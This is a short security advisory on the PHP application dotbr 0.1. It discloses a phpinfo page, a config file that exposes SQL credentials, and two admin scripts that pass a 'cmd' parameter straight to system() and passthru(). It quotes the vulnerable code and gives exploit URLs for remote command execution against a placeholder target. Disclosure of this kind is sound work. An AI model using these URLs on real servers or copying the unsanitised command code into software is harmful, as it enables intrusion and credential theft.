Informations : °°°°°°°°°°°°°° Website : http://dotbr.org Version : 0.1 Problems : - phpinfo() - Informations disclosure - System commands execution PHP Code/Location : °°°°°°°°°°°°°°°°°°° foo.php3 : --------------------- <? phpinfo(); ?> --------------------- config.inc : - SQL password - SQL host - SQL username - SQL DB name admin/exec.php3 : --------------------------------------- <html> <body> <pre> <? if (!isset($sep)) { $sep = "_"; } $cmd=str_replace($sep," ",$cmd); passthru($cmd,$ret); echo $ret; ?> </pre> </body> </html> --------------------------------------- admin/system.php3 : --------------------------------------- <html> <body> <pre> <? $cmd = str_replace("_"," ",$cmd); system($cmd,$result); echo "\n result == ". $result . "\n"; ?> </pre> </body> </html> --------------------------------------- Exploits : °°°°°°°°°° http://[target]/foo.php3 http://[target]/config.inc http://[target]/admin/exec.php3?cmd=[COMMAND] http://[target]/admin/system.php3?cmd=[COMMAND] More Details : °°°°°°°°°°°°°° In French : http://www.frog-man.org/tutos/5holes8.txt Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2F5holes8.txt&langpair=fr%7Cen&hl=fr&ie=ISO-8859-1&prev=%2Flanguage_tools frog-m@n http://www.phpsecure.org _________________________________________________________________
